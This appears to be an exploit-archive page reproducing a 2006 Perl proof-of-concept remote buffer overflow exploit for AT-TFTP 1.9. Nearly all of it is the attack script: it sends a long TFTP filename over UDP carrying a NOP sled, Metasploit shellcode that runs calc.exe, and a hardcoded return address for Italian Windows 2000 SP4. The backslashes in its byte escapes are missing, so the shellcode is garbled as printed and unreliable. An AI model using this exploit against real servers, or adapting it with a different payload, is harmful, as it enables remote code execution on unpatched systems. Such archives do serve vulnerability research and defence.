AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : AT-TFTP <= 1.9 (Long Filename) Remote Buffer Overflow Exploit
# Published : 2006-12-03
# Author : Jacopo Cervini
# Previous Title : Madwifi < 0.9.2.1 SIOCGIWSCAN Buffer Overflow
# Next Title : 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Exploit

#!/usr/bin/perl -w
#acaro[at]jervus.it
#http://www.securityfocus.com/bid/21320
#
# liuqx@nipc.org.cn is credited with the discovery of this vulnerability



use IO::Socket;

if(!($ARGV[1]))
{
 print "Uso: atftp-19.pl <victim> <port>nn";
 exit;
}



$victim = IO::Socket::INET->new(Proto=>'udp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Cannot connect to $ARGV[0] sulla porta $ARGV[1]";
$pad = "x90"x63;

# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

$shellcode = "x33xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xf1".
"xf1x59x06x83xebxfcxe2xf4x0dx19x1dx06xf1xf1xd2x43".
"xcdx7ax25x03x89xf0xb6x8dxbexe9xd2x59xd1xf0xb2x4f".
"x7axc5xd2x07x1fxc0x99x9fx5dx75x99x72xf6x30x93x0b".
"xf0x33xb2xf2xcaxa5x7dx02x84x14xd2x59xd5xf0xb2x60".
"x7axfdx12x8dxaexedx58xedx7axedxd2x07x1ax78x05x22".
"xf5x32x68xc6x95x7ax19x36x74x31x21x0ax7axb1x55x8d".
"x81xedxf4x8dx99xf9xb2x0fx7ax71xe9x06xf1xf1xd2x6e".
"xcdxaex68xf0x91xa7xd0xfex72x31x22x56x99x01xd3x02".
"xaex99xc1xf8x7bxffx0exf9x16x92x38x6ax92xdfx3cx7e".
"x94xf1x59x06";

#$eip="x42x42x42x42";
$eip="xf4xf5xe3x75";	#call [ESP+28] in IMM32.dll on win2k Server SP4 Italian 



$mode = "netascii";

$exploit = "x00x02" . $pad . $shellcode . $eip . ""  . $mode . "";


print $victim $exploit;

print " + Malicious request sent ...n";

sleep(2);

print "Done.n";

close($victim);
exit;

# www.Syue.com [2006-12-03]